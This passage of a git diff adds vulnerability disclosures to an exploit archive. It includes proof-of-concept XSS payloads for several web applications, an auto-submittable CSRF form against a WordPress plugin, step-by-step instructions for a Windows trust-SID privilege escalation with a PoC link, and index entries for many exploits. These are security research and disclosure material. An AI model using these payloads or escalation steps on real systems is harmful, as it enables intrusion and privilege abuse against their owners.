+Having the permissions to edit the config/products, you can simply write </textarea><script>alert(1)</script> inside a textarea, when someone will edit it back the alert will execute on the editor's browser
+
+# 3. Solution: Upgrade to 3.2.14
+# http://virtuemart.net/news/489-virtuemart-3-2-14-security-release-and-enhanced-invoice-handling
\ No newline at end of file
diff --git a/exploits/php/webapps/44627.txt b/exploits/php/webapps/44627.txt
new file mode 100644
index 000000000..ccac2571f
--- /dev/null
+++ b/exploits/php/webapps/44627.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Multiplayer BlackJack - Online Casino Game 2.5 - Persistent Cross-Site scripting
+# Date: 2018-05-16
+# Exploit Author: L0RD
+# Vendor Homepage: https://codecanyon.net/item/multiplayer-blackjack-online-casino-game/15411706?s_rank=1628
+# CVE: N/A
+# Version: 2.5
+
+# Description : Multiplayer BlackJack - Online Casino Game script has persistent cross site scripting that attacker
+#  can set malicious payload into the vulnerable parameter.
+
+# POC :
+1) click on the "sit" button in the web page
+2) Put this payload into the "name" input and set wallet number :
+<script>alert(document.domain)</script>
+3) You will get an alert box in the page .
\ No newline at end of file
diff --git a/exploits/php/webapps/44632.html b/exploits/php/webapps/44632.html
new file mode 100644
index 000000000..edf56688c
--- /dev/null
+++ b/exploits/php/webapps/44632.html
@@ -0,0 +1,62 @@
+<!--
+Details
+================
+Software: Metronet Tag Manager
+Version: 1.2.7
+Homepage: https://wordpress.org/plugins/metronet-tag-manager/
+Advisory report: https://advisories.dxw.com/advisories/csrf-metronet-tag-manager/
+CVE: Awaiting assignment
+CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
+
+Description
+================
+CSRF in Metronet Tag Manager allows anybody to do almost anything an admin can
+
+Vulnerability
+================
+The pluginas settings page sends a nonce, and checks it when displaying the success/failure message, but is not checked when setting options.
+This option is meant to contain JavaScript for Google Tag Manager, so itas displayed on every frontend page without escaping.
+As this vulnerability allows adding arbitrary JavaScript, the attacker can use it to control an admin useras browser to do almost anything an admin user can do.
+
+Proof of concept
+================
+-->
+
+Press submit on a page containing the following HTML snippet:
+<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=metronet-tag-manager\">
+ <input type=\"text\" name=\"submit\" value=\"1\">
+ <input type=\"text\" name=\"gtm-code-head\" value=\"<script>alert(1)</script>\">
+ <input type=\"submit\">
+</form>
+
+<!--
+In a real attack, the form can be made to autosubmit so the victim only has to follow a link.
+
+Mitigations
+================
+Upgrade to version 1.2.9 or later.
+
+Disclosure policy
+================
+dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
+
+Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
+
+This vulnerability will be published if we do not receive a response to this report with 14 days.
+
+Timeline
+================
+
+2018-04-13: Discovered
+2018-04-16: Reported to plugin author via Facebook private message
+2018-04-17: Plugin author confirmed receipt of message
+2018-04-24: Plugin changelog indicates bug has been fixed in 1.2.9
+2018-05-15: Advisory published
+
+
+
+Discovered by dxw:
+================
+Tom Adams
+Please visit security.dxw.com for more information.
+-->
\ No newline at end of file
diff --git a/exploits/windows/local/44630.txt b/exploits/windows/local/44630.txt
new file mode 100644
index 000000000..589100534
--- /dev/null
+++ b/exploits/windows/local/44630.txt
@@ -0,0 +1,36 @@
+Windows: Token Trust SID Access Check Bypass EOP
+Platform: Windows 10 1709 (also tested current build of RS4)
+Class: Elevation of Privilege
+
+Summary: A token’s trust SID isn’t reset when setting a token after process creation allowing a user process to bypass access checks for trust labels.
+
+Description:
+
+When a protected process is created it sets the protection inside the EPROCESS structure but also adds a special trust SID to the primary token as part of SeSubProcessToken. Where the process protection is used for things such as what access rights to other processes the trust SID is used for direct access checks where a security descriptor has a process trust label. A good example is the \KnownDlls object directory which is labeled as PPL-WinTcb to prevent tampering from anything not at that protection level.
+
+This trust SID isn’t cleared during duplication so it’s possible for a non-protected process to open the token of a protected process and duplicate it with the trust SID intact. However using that token should clear the SID, or at least cap it to the maximum process protection level. However there’s a missing edge case, when setting a primary token through NtSetInformationProcess (specifically in PspAssignPrimaryToken). Therefore we can exploit this with the following from a normal non-admin process:
+
+1) Create a protected process, werfaultsecure.exe is a good candidate as it’ll run PP-WinTcb. It doesn’t have to do anything special, just be created.
+2) Open the process token (we get PROCESS_QUERY_LIMITED_INFORMATION) and duplicate it to a new primary token.
+3) Create a new suspended process which will run the exploit code with the original token. 
+4) Set the protected process token using NtSetInformationProcess
+5) Resume exploit process and do something which needs to pass the trust label check.
+
+NOTE: There is also a related issue during impersonation and the call to SeTokenCanImpersonate. Normally the current process trust SID is checked against the impersonation token trust SID and if the process token’s is lower a flag is returned to the caller which resets the new token’s trust SID to the process one. This check occurs before the check for SeImpersonatePrivilege but _after_ the check for an anonymous token authentication ID. Therefore if you’re an admin you could craft a token with the anonymous token authentication ID (but with actual groups) and do a similar trick as with the process token to prevent the reset of the trust SID during impersonation. However I couldn’t find an obvious use for this as the trust label seems to be based on the minimum between the impersonation and process token’s trust SIDs and when impersonating over a boundary such as in RPC it looks like it gets reset to the process’ protection level. But might be worth cleaning this up as well if you’re there.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It does the previous described trick to run a process which can then set the trust label on a new event object it creates (\BaseNamedObject\PPDEMO). If you run the poc with a command line parameter it will try and do the event creation but should print access denied.
+
+1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
+2) Run the poc with no parameters as a normal user. It will capture the token and respawn itself to create the event.
+
+Expected Result:
+Setting the trust label returns access denied.
+
+Observed Result:
+The trust label is successfully set.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44630.zip
\ No newline at end of file
diff --git a/exploits/windows/webapps/44626.txt b/exploits/windows/webapps/44626.txt
new file mode 100644
index 000000000..8e62c33e7
--- /dev/null
+++ b/exploits/windows/webapps/44626.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Rockwell Scada System - Cross-Site Scripting
+# Date: 2018-05-16
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: https://rockwellautomation.com/
+# Software Link: http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?famID=4
+# Version: 1769-L16ER-BB1B, Version 27.011 and earlier, 1769-L18ER-BB1B, Version 27.011 and earlier, 
+# 1769-L18ERM-BB1B, Version 27.011 and earlier, 1769-L24ER-QB1B, 
+# Version 27.011 and earlier, 1769-L24ER-QBFC1B
+# Version 27.011 and earlier, 1769-L27ERM-QBFC1B, Version 27.011 and earlier 
+# 1769-L30ER Version 27.011 and earlier, 1769-L30ERM, Version 27.011 and earlier, 
+# 1769-L30ER-NSE, Version 27.011 and earlier
+# 1769-L33ER Version 27.011 and earlier, 1769-L33ERM, Version 27.011 and earlier, 1769-L36ERM, Version 27.011 and earlier 
+# 1769-L23E-QB1B, Version 20.018 and earlier (Discontinued June 2016), and 1769-L23E-QBFC1B, Version 20.018 and earlier 
+# (Discontinued June 2016).
+# Tested on: Windows Machine and Chrome,Firefox explorer
+# CVE : CVE-2016-2279
+
+# PoC 
+http://TargetIP/rokform/SysDataDetail?name=<<script>alert(1);</script>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0495f8e0d..b22410737 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5971,6 +5971,7 @@ id,file,description,date,author,type,platform,port
 44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
 44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
 44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
+44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9712,6 +9713,8 @@ id,file,description,date,author,type,platform,port
 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
 44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
 44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
+44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
+44633,exploits/linux/local/44633.rb,"Libuser - roothelper Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16487,6 +16490,7 @@ id,file,description,date,author,type,platform,port
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
 44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
+44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39309,3 +39313,11 @@ id,file,description,date,author,type,platform,port
 44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php,
 44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php,
 44623,exploits/multiple/webapps/44623.txt,"JasperReports - Authenticated File Read",2018-05-03,"Hector Monsegur",webapps,multiple,
+44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php,
+44625,exploits/php/webapps/44625.txt,"VirtueMart 3.1.14 - Persistent Cross-Site Scripting",2018-05-16,"Mattia Furlani",webapps,php,
+44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,
+44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
+44628,exploits/linux/webapps/44628.txt,"Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery",2018-05-16,L0RD,webapps,linux,
+44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
+44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
+44634,exploits/java/webapps/44634.txt,"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting",2018-05-16,"SEC Consult",webapps,java,